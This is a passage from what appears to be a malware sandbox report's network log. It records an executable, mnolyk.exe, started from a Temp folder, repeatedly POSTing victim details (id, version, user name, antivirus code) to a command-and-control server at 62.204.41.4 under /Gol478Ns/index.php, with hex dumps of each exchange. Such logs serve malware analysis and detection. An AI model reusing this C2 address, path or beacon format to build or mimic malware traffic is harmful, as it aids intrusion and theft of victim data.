                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:17.773282051 CET906INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          752192.168.2.65047762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:17.942955971 CET907OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:18.007100105 CET907INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          753192.168.2.65047862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:18.186763048 CET908OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:18.252865076 CET908INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          754192.168.2.65047962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:18.422959089 CET909OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:18.484904051 CET909INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          755192.168.2.65048062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:18.662379026 CET910OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:18.724710941 CET910INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          756192.168.2.65048162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:18.893120050 CET911OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:18.956362963 CET911INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          76192.168.2.64979662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:11.751019001 CET196OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:11.815969944 CET196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          77192.168.2.64979762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:12.000477076 CET197OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:12.065249920 CET197INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          78192.168.2.64979862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:12.233155012 CET198OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:12.297056913 CET198INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          79192.168.2.64979962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:12.467160940 CET199OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:12.532263994 CET199INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          8192.168.2.64972662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:52.825968981 CET113OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:52.889281034 CET113INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          80192.168.2.64980062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:12.702989101 CET200OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:12.766032934 CET200INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          81192.168.2.64980162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:12.934086084 CET201OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:12.996850014 CET201INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          82192.168.2.64980262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:13.174021006 CET202OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:13.239062071 CET202INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          83192.168.2.64980362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:13.424989939 CET203OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:13.487775087 CET203INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          84192.168.2.64980462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:13.672357082 CET204OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:13.735300064 CET204INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          85192.168.2.64980562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:13.918183088 CET205OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:13.980031013 CET205INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          86192.168.2.64980662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:14.154494047 CET206OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:14.220354080 CET206INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          87192.168.2.64980762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:14.403500080 CET207OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:14.468887091 CET207INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          88192.168.2.64980862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:14.637798071 CET208OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:14.701153040 CET208INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          89192.168.2.64980962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:14.874634027 CET209OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:14.937292099 CET209INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          9192.168.2.64972762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:53.058922052 CET114OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
